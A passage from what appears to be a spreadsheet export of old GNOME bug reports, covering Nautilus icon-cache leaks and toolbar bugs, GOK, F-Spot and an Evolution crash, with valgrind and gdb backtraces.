==8732==    by 0x1C48A20F: g_object_constructor (gobject.c:1052)
==8732==    by 0x1C48A861: g_object_newv (gobject.c:949)
==8732==    by 0x1C48B3EA: g_object_new_valist (gobject.c:1033)
==8732==    by 0x1C48B509: g_object_new (gobject.c:830)
==8732==    by 0x1C01C2EB: gdk_pixbuf_new_from_data (gdk-pixbuf-data.c:65)
==8732==    by 0x1C01A832: gdk_pixbuf_new (gdk-pixbuf.c:297)
==8732==    by 0x1C01FFD7: gdk_pixbuf_scale_simple (gdk-pixbuf-scale.c:252)
==8732==    by 0x1B96CA9F: create_normal_cache_icon (nautilus-icon-factory.c:1099)
==8732==    by 0x1B96CCB0: nautilus_icon_factory_get_pixbuf_for_icon_internal
(nautilus-icon-factory.c:1329)
==8732==    by 0x1B96D022: nautilus_icon_factory_get_pixbuf_for_file_internal
(nautilus-icon-factory.c:1545)
==8732==    by 0x80A942A: fm_list_model_get_value (fm-list-model.c:231)
==8732==    by 0x1BE7C310: gtk_tree_model_get_value (gtktreemodel.c:1077)
==8732==    by 0x1BEA5C12: gtk_tree_view_column_cell_set_cell_data
(gtktreeviewcolumn.c:2548)
==8732==    by 0x1BE8FF88: validate_row (gtktreeview.c:4589)
==8732==    by 0x1BE92EAD: validate_visible_area (gtktreeview.c:4866)
==8732==    by 0x1BE9382E: do_presize_handler (gtktreeview.c:5203)
==8732==    by 0x1BE93878: presize_handler_callback (gtktreeview.c:5214)
==8732==    by 0x1C4E4FFF: g_idle_dispatch (gmain.c:3812)
==8732==    by 0x1C4E2E5D: g_main_context_dispatch (gmain.c:1933)
==8732==    by 0x1C4E5C2D: g_main_context_iterate (gmain.c:2564)
==8732==    by 0x1C4E612E: g_main_loop_run (gmain.c:2768)
==8732==    by 0x1BDD0464: gtk_main (gtkmain.c:974)
==8732==    by 0x8070E89: main (nautilus-main.c:434)
It looks like the code in get_icon_from_cache() takes two refs on the icon?
        if (cached_icon == NULL) {
                /* Not in the table so load the image. */
                /*
                g_print (cache miss for %s:%s:%s:%d\n
                         icon modifier?modifier: embedded_text?:
nominal_size)
                */
                cached_icon = create_normal_cache_icon (icon
                                                        modifier
                                                        nominal_size
                                                        force_nominal)
                /* Try to fallback without modifier */
                if (cached_icon == NULL &amp;&amp; modifier != NULL) {
                        cached_icon = create_normal_cache_icon (icon
                                                                NULL
                                                                nominal_size
                                                                force_nominal)
                }
                if (cached_icon == NULL) {
                        cached_icon = factory-&gt;fallback_icon
                        cache_icon_ref (cached_icon)
                }
                /* Create the key and icon for the hash table. */
                key = g_new (CacheKey 1)
                key-&gt;name = g_strdup (icon)
                key-&gt;modifier = g_strdup (modifier)
                key-&gt;nominal_size = nominal_size
                key-&gt;force_nominal = force_nominal
                g_hash_table_insert (hash_table key cached_icon)
        }
        /* Hand back a ref to the caller. */
        cache_icon_ref (cached_icon)
        /* Since this item was used keep it in the cache longer. */
        mark_recently_used (
        /* Come back later and sweep the cache. */
        nautilus_icon_factory_schedule_sweep (factory)
        return cached_icon
}</t>
  </si>
  <si>
    <t>GOK-114726</t>
  </si>
  <si>
    <t>GOK should warn if XKB isn't enabled warn if StickyKeys is off and offer to engage</t>
  </si>
  <si>
    <t>GOK should detect absence of XKB and warn user.
GOK should detect if StickyKeys is off and offer to set it.</t>
  </si>
  <si>
    <t>F-SPOT-361339</t>
  </si>
  <si>
    <t>Missing google-sharp/CaptchaException.cs</t>
  </si>
  <si>
    <t>Please describe the problem:
CaptchaException.cs was added on 2006-10-06 (according to ChangeLog) but doesn't exist in CVS.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>NAUTILUS-47238</t>
  </si>
  <si>
    <t>View as EOG Image adds toolbar icons that don't go away</t>
  </si>
  <si>
    <t xml:space="preserve">After using the EOG image and changing to another view the EOG image viewer
toolbar icons don't go away.
To reproduce:
1 - Right-click on an image file (I used gif and png during testing)
2 - Choose Open With &gt; Other Viewer
3 - Choose View as EOG Image Modify Include in the menu Done
4 - Right-click on the same image and choose Open with &gt; EOG Image View. 
Notice that four new toolbar icons appear.
5 - Press your Home icon which presumably changes the view to one of Icon
List or Web.  
The EOG viewer toolbar icons are still in the toolbar.  Screenshot will be
attached showing the icons.
Not a bug for 1.0.
------- Additional Comments From brett@eazel.com 2001-03-01 16:18:28 ----
Created an attachment (id=1281)
Screen shot of misplaced toolbar icons
------- Additional Comments From brett@eazel.com 2001-03-01 16:21:52 ----
Created an attachment (id=1282)
Same screen shot in JPG format because gimp's PNGs show up funny in Netscape 4
------- Additional Comments From darin@bentspoon.com 2001-03-01 16:28:17 ----
Oh crap. Probably a Bonobo bug. Is this really specific to the EOG viewer or
does this also happen with Sample and other viewers that add toolbar icons?
------- Additional Comments From don@eazel.com 2001-03-01 16:28:34 ----
Is this a regression?  Should Arik look at this?
------- Additional Comments From jsh@pixelslut.com 2001-03-01 16:32:27 ----
I'm going to look at this (I have no other 1.0 bugs)
------- Additional Comments From jsh@pixelslut.com 2001-03-01 16:32:56 ----
Estimating four hours for some reason..
------- Additional Comments From arik@eazel.com 2001-03-01 16:45:27 ----
i would like to review this patch if i am around.
------- Additional Comments From jsh@pixelslut.com 2001-03-01 17:19:04 ----
It also leaves its menu items behind (in the view pane)
------- Additional Comments From jsh@pixelslut.com 2001-03-01 17:29:20 ----
I've found why it doesn't unmerge the toolbar icons now for the menus
------- Additional Comments From jsh@pixelslut.com 2001-03-01 17:29:42 ----
(and the fix goes in eog not nautilus or bonobo)
------- Additional Comments From arik@eazel.com 2001-03-01 17:43:54 ----
i figured as much. whatever needs to go into eog you can send to me.
------- Additional Comments From don@eazel.com 2001-03-01 18:54:28 ----
Approved for 1.0.
------- Additional Comments From jsh@pixelslut.com 2001-03-01 18:57:01 ----
My `fix' turned out to be broken..
So back to the drawing board. None of the `destroy' methods of the objects seem
to get called so I think it may be some kind of ref-counting / deallocation
problem..
------- Additional Comments From jsh@pixelslut.com 2001-03-01 21:45:55 ----
I fixed this problem by making the nautilus component adapter deactivate objects
when they're destroyed
I think there may still be an EOG ref-leak but I can't find it ..
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:06 -------
</t>
  </si>
  <si>
    <t>GNOME-USER-DOCS-145193</t>
  </si>
  <si>
    <t>Setting the default background</t>
  </si>
  <si>
    <t>I seem to be unable to find an easy option to set this (other than using gconf).
There is a greyed-out Use default background in the pop up menu when I
right click somewhere in a folder. When I set a default background image
using gconf or select a background for the folder the option is no longer
greyed-out but clicking it resets all folders to a plain white background (and
not the default background image I entered in gconf) and also unchecks the use
default background checkbox in gconf.
Shouldn't there be an easy method to set the default background?
Using Gnome 2.6.1 on Arch Linux</t>
  </si>
  <si>
    <t>steven.vanimpe</t>
  </si>
  <si>
    <t>F-SPOT-158951</t>
  </si>
  <si>
    <t>Some dialogs don't use stock buttons</t>
  </si>
  <si>
    <t>CreateTag EditTag</t>
  </si>
  <si>
    <t>loz</t>
  </si>
  <si>
    <t>EVOLUTION-256264</t>
  </si>
  <si>
    <t>Crash creating new contact list when I have deleted all my addressbooks</t>
  </si>
  <si>
    <t>Distribution: SuSE Linux 9.0 (i586)
Package: Evolution
Priority: Normal
Version: GNOME2.6. unspecified
Gnome-Distributor: GNOME.Org
Synopsis: Crash creating new contact list when I have deleted all my addressbooks
Bugzilla-Product: Evolution
Bugzilla-Component: Contacts [was: Addressbook]
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.6.0)
Description:
I have accidentally deleted all my addressbooks in gconf now I can't
add any.
Debugging Information:
Backtrace was generated from '/opt/gnome/bin/evolution-1.5'
[New Thread 16384 (LWP 7903)]
[New Thread 32769 (LWP 7917)]
[New Thread 16386 (LWP 7918)]
[New Thread 524291 (LWP 7996)]
[New Thread 311300 (LWP 7974)]
[New Thread 557061 (LWP 7998)]
[New Thread 491526 (LWP 7994)]
[New Thread 589832 (LWP 8000)]
0x41439ab6 in waitpid () from /lib/i686/libpthread.so.0
#0  0x41439ab6 in waitpid () from /lib/i686/libpthread.so.0
#1  0x4047b5d8 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:741
#2  0x080663a1 in segv_redirect (sig=11) at main.c:445
#3  0x4143896c in __pthread_sighandler () from
/lib/i686/libpthread.so.0
#4  
#5  0x416f2dea in strcmp () from /lib/i686/libc.so.6
#6  0x41b7452a in fill_popup_menu_callback (selector=0x87f4ca8 
    menu=0x878c0b0 comp=0x81433e0) at addressbook-component.c:311
#7  0x415ce647 in g_cclosure_marshal_VOID__OBJECT (closure=0x87f3f50 
    return_value=0x0 n_param_values=2 param_values=0xbfffec70 
    invocation_hint=0xbfffead8 marshal_data=0x0) at gmarshal.c:636
#8  0x415b6c34 in g_closure_invoke (closure=0x87f3f50 return_value=0x0
    n_param_values=2 param_values=0xbfffec70
invocation_hint=0xbfffead8)
    at gclosure.c:437
#9  0x415ccefa in signal_emit_unlocked_R (node=0x81832f8 detail=0 
    instance=0x87f4ca8 emission_return=0x0
instance_and_params=0xbfffec70)
    at gsignal.c:2436
#10 0x415cc0b2 in g_signal_emit_valist (instance=0x87f4ca8
signal_id=229 
    detail=0 var_args=0xbfffee00 \030\026\030\bÂ¼\037\a\b$) at
gsignal.c:2195
#11 0x415cc3ff in g_signal_emit (instance=0x87f4ca8 signal_id=229
detail=0)
    at gsignal.c:2239
#12 0x4006448c in selector_button_press_event (widget=0x87f4ca8 
    event=0x80bd2d8 selector=0x87f4ca8) at e-source-selector.c:598
#13 0x41127e9c in _gtk_marshal_BOOLEAN__BOXED (closure=0x87ec9d8 
    return_value=0xbfffeff0 n_param_values=2 param_values=0xbffff1c0
    invocation_hint=0xbffff028 marshal_data=0x0) at gtkmarshalers.c:82
#14 0x415b6c34 in g_closure_invoke (closure=0x87ec9d8 
    return_value=0xbfffeff0 n_param_values=2 param_values=0xbffff1c0
    invocation_hint=0xbffff028) at gclosure.c:437
#15 0x415ccefa in signal_emit_unlocked_R (node=0x80c2a48 detail=0 
    instance=0x87f4ca8 emission_return=0xbffff140 
    instance_and_params=0xbffff1c0) at gsignal.c:2436
#16 0x415cc12f in g_signal_emit_valist (instance=0x87f4ca8
signal_id=42 
    detail=0 
    var_args=0xbffff350 \200Ã³Ã¿Â¿Â¸ \n\b\210Ã³Ã¿Â¿N&gt;$AP\026\030\bÂ¸
\n\b\001)
    at gsignal.c:2205
#17 0x415cc3ff in g_signal_emit (instance=0x87f4ca8 signal_id=42
detail=0)
    at gsignal.c:2239
#18 0x41244076 in gtk_widget_event_internal (widget=0x87f4ca8
event=0x80bd2d8)
    at gtkwidget.c:3563
#19 0x41243bae in gtk_widget_event (widget=0x87f4ca8 event=0x80bd2d8)
    at gtkwidget.c:3369
#20 0x41126270 in gtk_propagate_event (widget=0x87f4ca8
event=0x80bd2d8)
    at gtkmain.c:2344
#21 0x41124d6c in gtk_main_do_event (event=0x80bd2d8) at gtkmain.c:1567
#22 0x414d5766 in gdk_event_dispatch (source=0x8096758 callback=0 
    user_data=0x0) at gdkevents-x11.c:2133
#23 0x4161954d in g_main_dispatch (context=0x80967a0) at gmain.c:1895
#24 0x4161a8b9 in g_main_context_dispatch (context=0x80967a0) at
gmain.c:2441
#25 0x4161adec in g_main_context_iterate (context=0x80967a0 block=1 
    dispatch=1 self=0x8077318) at gmain.c:2522
#26 0x4161b643 in g_main_loop_run (loop=0x80b9dd0) at gmain.c:2726
#27 0x407cb9ff in bonobo_main () at bonobo-main.c:297
#28 0x0806688a in main (argc=1 argv=0xbffff7d4) at main.c:589
Thread 8 (Thread 589832 (LWP 8000)):
#0  0x41435b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x414359d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x41431e90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008987e in e_msgport_wait (mp=0x80fd480) at e-msgport.c:511
	_buffer = {__routine = 0x400895e6  
  __arg = 0x80fd480 __canceltype = 1156673060 __prev = 0x0}
	msg = (EMsg *) 0x4143416f
#4  0x4008a196 in thread_dispatch (din=0x80fd428) at e-msgport.c:874
	e = (EThread *) 0x80fd428
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x86d36a8
	self = 589832
#5  0x41432f60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41757327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 7 (Thread 491526 (LWP 7994)):
#0  0x41435b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x414359d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x41431e90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x41601d20 in g_async_queue_pop_intern_unlocked (queue=0x80971d8
try=0 
    end_time=0x0) at gasyncqueue.c:226
	retval = 0x41679d58
#4  0x41601fbc in g_async_queue_pop_unlocked (queue=0x80971d8)
    at gasyncqueue.c:288
No locals.
#5  0x416383d9 in g_thread_pool_thread_proxy (data=0x80971b0)
    at gthreadpool.c:96
	task = 0xfffff
	goto_global_pool = 1
	len = -2
	pool = (GRealThreadPool *) 0x80971b0
	watcher = 0
#6  0x4163708b in g_thread_create_proxy (data=0x85c96d8) at
gthread.c:559
	thread = (GRealThread *) 0x85c96d8
#7  0x41432f60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#8  0x41757327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 6 (Thread 557061 (LWP 7998)):
#0  0x41435b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x414359d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x41431e90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008987e in e_msgport_wait (mp=0x80fd3d8) at e-msgport.c:511
	_buffer = {__routine = 0x400895e6  
  __arg = 0x80fd3d8 __canceltype = 1139895860 __prev = 0x0}
	msg = (EMsg *) 0x4143416f
#4  0x4008a196 in thread_dispatch (din=0x80fd380) at e-msgport.c:874
	e = (EThread *) 0x80fd380
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 557061
#5  0x41432f60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41757327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 5 (Thread 311300 (LWP 7974)):
#0  0x4174eb66 in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4161baf1 in g_main_context_poll (context=0x828e000 timeout=-1 
    priority=2147483647 fds=0x8517540 n_fds=1) at gmain.c:2824
	poll_func = 0x4174eb00 
#2  0x4161adc1 in g_main_context_iterate (context=0x828e000 block=1 
    dispatch=1 self=0x851fbf8) at gmain.c:2517
	max_priority = 2147483647
	timeout = -1
	some_ready = 1
	nfds = 1
	allocated_nfds = 1
	fds = (GPollFD *) 0x8517540
#3  0x4161b643 in g_main_loop_run (loop=0x851ae00) at gmain.c:2726
	self = (GThread *) 0x851fbf8
#4  0x41a2143f in startup_mainloop (arg=0x0) at e-book.c:2374
	loop = (GMainLoop *) 0x851ae00
#5  0x41432f60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41757327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 4 (Thread 524291 (LWP 7996)):
#0  0x41435b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x414359d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x41431e90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008987e in e_msgport_wait (mp=0x80fd480) at e-msgport.c:511
	_buffer = {__routine = 0x400895e6  
  __arg = 0x80fd480 __canceltype = 1131507236 __prev = 0x0}
	msg = (EMsg *) 0x4143416f
#4  0x4008a196 in thread_dispatch (din=0x80fd428) at e-msgport.c:874
	e = (EThread *) 0x80fd428
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x86341f8
	self = 524291
#5  0x41432f60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41757327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 3 (Thread 16386 (LWP 7918)):
#0  0x4174eb66 in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4161baf1 in g_main_context_poll (context=0x8247208 timeout=-1 
    priority=2147483647 fds=0x816d868 n_fds=9) at gmain.c:2824
	poll_func = 0x4174eb00 
#2  0x4161adc1 in g_main_context_iterate (context=0x8247208 block=1 
    dispatch=1 self=0x80a0d20) at gmain.c:2517
	max_priority = 2147483647
	timeout = -1
	some_ready = 1
	nfds = 9
	allocated_nfds = 9
	fds = (GPollFD *) 0x816d868
#3  0x4161b643 in g_main_loop_run (loop=0x8264af0) at gmain.c:2726
	self = (GThread *) 0x80a0d20
#4  0x409fe7ee in link_io_thread_fn (data=0x0) at linc.c:343
No locals.
#5  0x4163708b in g_thread_create_proxy (data=0x80a0d20) at
gthread.c:559
	thread = (GRealThread *) 0x80a0d20
#6  0x41432f60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#7  0x41757327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 2 (Thread 32769 (LWP 7917)):
#0  0x4174eb66 in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x41432a8e in __pthread_manager () from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x41757327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 1 (Thread 16384 (LWP 7903)):
#0  0x41439ab6 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#1  0x4047b5d8 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:741
	estatus = -1073748776
	eret = 1090861435
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {0 364 17119611 135634080 3 1 134679264 0 
      1096718384 0 1094939310 135627424 3 3221218560 1094956684 
      142131376 1096719608 3221218584 1094956684 142131376
3221218900 
      3221218584 1094926703 1096719624 1096718384 3221218984
1096603483 
      1096719608 3221218928 3221218880 0 0}} sa_flags = 0 
  sa_restorer = 0x415e9cf8 }
	pid = 8005
#2  0x080663a1 in segv_redirect (sig=11) at main.c:445
No locals.
#3  0x4143896c in __pthread_sighandler () from
/lib/i686/libpthread.so.0
No symbol table info available.
#4  
No symbol table info available.
#5  0x416f2dea in strcmp () from /lib/i686/libc.so.6
No symbol table info available.
#6  0x41b7452a in fill_popup_menu_callback (selector=0x87f4ca8 
    menu=0x878c0b0 comp=0x81433e0) at addressbook-component.c:311
	sensitive = 0
	local_addressbook = 142560424
	selected_source = (ESource *) 0x0
#7  0x415ce647 in g_cclosure_marshal_VOID__OBJECT (closure=0x87f3f50 
    return_value=0x0 n_param_values=2 param_values=0xbfffec70 
    invocation_hint=0xbfffead8 marshal_data=0x0) at gmarshal.c:636
	callback = 0x41b744bb 
	cc = (GCClosure *) 0x87f3f50
	data1 = 0x87f4ca8
	data2 = 0x81433e0
#8  0x415b6c34 in g_closure_invoke (closure=0x87f3f50 return_value=0x0
    n_param_values=2 param_values=0xbfffec70
invocation_hint=0xbfffead8)
    at gclosure.c:437
	marshal = 0x415ce57a 
	marshal_data = 0x0
	in_marshal = 0
#9  0x415ccefa in signal_emit_unlocked_R (node=0x81832f8 detail=0 
    instance=0x87f4ca8 emission_return=0x0
instance_and_params=0xbfffec70)
    at gsignal.c:2436
	tmp = (Handler *) 0x87f4ca8
	handler = (Handler *) 0x8558368
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0xbffff020 instance = 0x87f4ca8 ihint = {
    signal_id = 229 detail = 0 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
	class_closure = (GClosure *) 0x81832a8
	hlist = (HandlerList *) 0x87f2e70
	handler_list = (Handler *) 0x8558368
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
	signal_id = 229
	max_sequential_handler_number = 20048
	return_value_altered = 0
#10 0x415cc0b2 in g_signal_emit_valist (instance=0x87f4ca8
signal_id=229 
    detail=0 var_args=0xbfffee00 \030\026\030\bÂ¼\037\a\b$) at
gsignal.c:2195
	instance_and_params = (GValue *) 0xbfffec70
	stack_values = {{g_type = 135796304 data = {{v_int = 142560424 
        v_uint = 142560424 v_long = 142560424 v_ulong = 142560424 
        v_int64 = 142560424 v_uint64 = 142560424 v_float =
7.68263802e-34 
        v_double = 7.0434207954961944e-316 v_pointer = 0x87f4ca8} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 80 data = {{v_int = 142131376 v_uint = 142131376 
        v_long = 142131376 v_ulong = 142131376 v_int64 = 142131376 
        v_uint64 = 142131376 v_float = 7.48562884e-34 
        v_double = 7.0222230077745049e-316 v_pointer = 0x878c0b0} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 1096719488 data = {{v_int = 134678232 v_uint = 134678232
        v_long = 134678232 v_ulong = 134678232 v_int64 =
599012148240647896 
        v_uint64 = 599012148240647896 v_float = 4.06331296e-34 
        v_double = 1.220429277401242e-268 v_pointer = 0x80706d8} {
        v_int = 1096719488 v_uint = 1096719488 v_long = 1096719488 
        v_ulong = 1096719488 v_int64 = 578438603019820160 
        v_uint64 = 578438603019820160 v_float = 13.913208 
        v_double = 5.4483663793726163e-270 v_pointer = 0x415e9c80}}}
{
    g_type = 142131376 data = {{v_int = 1093698804 v_uint =
1093698804 
        v_long = 1093698804 v_ulong = 1093698804 
        v_int64 = -4611703592339864332 v_uint64 = 13835040481369687284
        v_float = 11.0324593 v_double = -1.9960978075471845 
        v_pointer = 0x413084f4} {v_int = -1073746712 v_uint =
3221220584 
        v_long = -1073746712 v_ulong = 3221220584 v_int64 =
3221220584 
        v_uint64 = 3221220584 v_float = -1.9994173 
        v_double = 1.5914944282310774e-314 v_pointer = 0xbfffece8}}}
{
    g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
        v_int64 = -4294967296 v_uint64 = 18446744069414584320 v_float
= 0 
        v_double = -nan(0xfffff00000000) v_pointer = 0x0} {v_int = 0
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 0 data
= {{
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {
        v_int = 135531048 v_uint = 135531048 v_long = 135531048 
        v_ulong = 135531048 v_int64 = 610449611791010344 
        v_uint64 = 610449611791010344 v_float = 4.45490686e-34 
        v_double = 7.4966321457593299e-268 v_pointer = 0x8140a28}}} {
    g_type = 139458828 data = {{v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double =
0 
        v_pointer = 0x0} {v_int = 1096718384 v_uint = 1096718384 
        v_long = 1096718384 v_ulong = 1096718384 
        v_int64 = -4611706186497091536 v_uint64 = 13835037887212460080
        v_float = 13.9121552 v_double = -1.9955217889305565 
        v_pointer = 0x415e9830}}} {g_type = 1096526430 data = {{
        v_int = 134902352 v_uint = 134902352 v_long = 134902352 
        v_ulong = 134902352 v_int64 = 134902352 v_uint64 = 134902352
        v_float = 4.16622381e-34 v_double = 6.6650617666383177e-316 
        v_pointer = 0x80a7250} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 4709544593408917504 
        v_uint64 = 4709544593408917504 v_float = 0 v_double = 7251820
        v_pointer = 0x0}}} {g_type = 135847520 data = {{v_int =
142131376 
        v_uint = 142131376 v_long = 142131376 v_ulong = 142131376 
        v_int64 = 4437098672 v_uint64 = 4437098672 v_float =
7.48562884e-34 
        v_double = 2.1922180210430174e-314 v_pointer = 0x878c0b0} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 0 data = {{v_int = 142131280 v_uint = 142131280 
        v_long = 142131280 v_ulong = 142131280 v_int64 =
612292358926024784 
        v_uint64 = 612292358926024784 v_float = 7.48558476e-34 
        v_double = 9.4793906464957423e-268 v_pointer = 0x878c050} {
        v_int = 1096645695 v_uint = 1096645695 v_long = 1096645695 
        v_ulong = 1096645695 v_int64 = 578594733670890559 
        v_uint64 = 578594733670890559 v_float = 13.8428335 
        v_double = 5.5796112312134618e-270 v_pointer = 0x415d7c3f}}}
{
    g_type = 3221220728 data = {{v_int = 1096646997 v_uint =
1096646997 
        v_long = 1096646997 v_ulong = 1096646997 
        v_int64 = 583460656739352917 v_uint64 = 583460656739352917 
        v_float = 13.8440752 v_double = 1.1768367252620941e-269 
        v_pointer = 0x415d8155} {v_int = 134714584 v_uint = 134714584
        v_long = 134714584 v_ulong = 134714584 v_int64 = 4429681880 
        v_uint64 = 4429681880 v_float = 4.08000498e-34 
        v_double = 2.1885536389134672e-314 v_pointer = 0x80794d8}}} {
    g_type = 1096646997 data = {{v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 4710369592201969664 
        v_uint64 = 4710369592201969664 v_float = 0 v_double = 8020160
        v_pointer = 0x0} {v_int = -1073746552 v_uint = 3221220744 
        v_long = -1073746552 v_ulong = 3221220744 v_int64 =
7516188040 
        v_uint64 = 7516188040 v_float = -1.99943638 
        v_double = 3.713490298246853e-314 v_pointer = 0xbfffed88}}} {
    g_type = 135796304 data = {{v_int = 1096718384 v_uint =
1096718384 
        v_long = 1096718384 v_ulong = 1096718384 
        v_int64 = -4611706255216568272 v_uint64 = 13835037818492983344
        v_float = 13.9121552 v_double = -1.995506530141494 
        v_pointer = 0x415e9830} {v_int = 1096647396 v_uint =
1096647396 
        v_long = 1096647396 v_ulong = 1096647396 
        v_int64 = 583240685694321380 v_uint64 = 583240685694321380 
        v_float = 13.8444557 v_double = 1.1398547912004439e-269 
        v_pointer = 0x415d82e4}}} {g_type = 134686900 data = {{v_int =
1 
        v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = 1 v_uint64 = 1
        v_float = 1.40129846e-45 v_double = 4.9406564584124654e-324 
        v_pointer = 0x1} {v_int = 0 v_uint = 0 v_long = 0 v_ulong =
0 
        v_int64 = 579401189993480192 v_uint64 = 579401189993480192 
        v_float = 0 v_double = 6.2575257844978452e-270 v_pointer =
0x0}}} {
    g_type = 1 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
        v_int64 = 4710057395324190720 v_uint64 = 4710057395324190720 
        v_float = 0 v_double = 7729404 v_pointer = 0x0} {v_int =
134686900 
        v_uint = 134686900 v_long = 134686900 v_ulong = 134686900 
        v_int64 = -4611705981300692812 v_uint64 = 13835038092408858804
        v_float = 4.06729311e-34 v_double = -1.9955673516838432 
        v_pointer = 0x80728b4}}} {g_type = 1096641993 data = {{
        v_int = 135796304 v_uint = 135796304 v_long = 135796304 
        v_ulong = 135796304 v_int64 = 578475830835418704 
        v_uint64 = 578475830835418704 v_float = 4.57670644e-34 
        v_double = 5.4796604213118006e-270 v_pointer = 0x8181650} {
        v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = 1 
        v_uint64 = 1 v_float = 1.40129846e-45 
        v_double = 4.9406564584124654e-324 v_pointer = 0x1}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0xbfffec84
	node = (SignalNode *) 0x81832f8
	i = 1
	n_params = 1
#11 0x415cc3ff in g_signal_emit (instance=0x87f4ca8 signal_id=229
detail=0)
    at gsignal.c:2239
	var_args = 0xbfffedfc Â°Ã€x\b\030\026\030\bÂ¼\037\a\b$
#12 0x4006448c in selector_button_press_event (widget=0x87f4ca8 
    event=0x80bd2d8 selector=0x87f4ca8) at e-source-selector.c:598
	priv = (ESourceSelectorPrivate *) 0x85edc68
	menu = (GtkWidget *) 0x878c0b0
	path = (GtkTreePath *) 0x0
	source = (ESource *) 0x0
#13 0x41127e9c in _gtk_marshal_BOOLEAN__BOXED (closure=0x87ec9d8 
    return_value=0xbfffeff0 n_param_values=2 param_values=0xbffff1c0
    invocation_hint=0xbffff028 marshal_data=0x0) at gtkmarshalers.c:82
	callback = 0x40064289 
	cc = (GCClosure *) 0x87ec9d8
	data1 = 0x87f4ca8
	data2 = 0x87f4ca8
	v_return = 8
#14 0x415b6c34 in g_closure_invoke (closure=0x87ec9d8 
    return_value=0xbfffeff0 n_param_values=2 param_values=0xbffff1c0
    invocation_hint=0xbffff028) at gclosure.c:437
	marshal = 0x41127d90 
	marshal_data = 0x0
	in_marshal = 0
#15 0x415ccefa in signal_emit_unlocked_R (node=0x80c2a48 detail=0 
    instance=0x87f4ca8 emission_return=0xbffff140 
